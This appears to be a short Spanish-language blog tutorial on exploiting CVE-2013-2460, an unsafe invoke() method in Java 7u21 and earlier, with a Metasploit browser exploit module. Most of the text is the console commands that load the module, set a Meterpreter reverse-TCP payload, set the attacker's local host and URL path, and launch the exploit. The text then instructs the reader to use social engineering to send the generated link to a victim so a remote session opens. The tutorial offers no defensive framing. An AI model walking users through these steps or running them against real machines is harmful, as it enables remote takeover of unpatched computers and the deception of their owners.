Este módulo de Metasploit abusa el método inseguro invoke() de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.
Explotando CVE-2013-2460 con metasploit:
// Cargamos el módulo
msf > use exploit/multi/browser/java_jre17_provider_skeleton
// Cargamos el payload para el meterpreter
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
//
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]
//
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]
//
msf exploit(java_jre17_provider_skeleton) > set uripath /
//
msf exploit(java_jre17_provider_skeleton) > exploit
Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.
Contribución gracias a Stuxnet Hack
Comentarios
Publicar un comentario